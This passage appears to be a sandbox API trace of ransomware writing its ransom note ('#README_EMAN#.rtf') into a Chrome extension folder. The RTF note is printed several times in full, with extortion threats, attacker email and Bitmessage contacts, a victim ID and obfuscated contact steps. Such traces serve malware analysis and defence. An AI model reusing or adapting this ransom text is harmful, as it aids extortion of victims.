algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.066] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.066] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.067] CloseHandle (hObject=0x294) returned 1 [0285.067] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\#readme_eman#.rtf")) returned 0xffffffff [0285.067] GetLastError () returned 0x2 [0285.067] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.067] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by 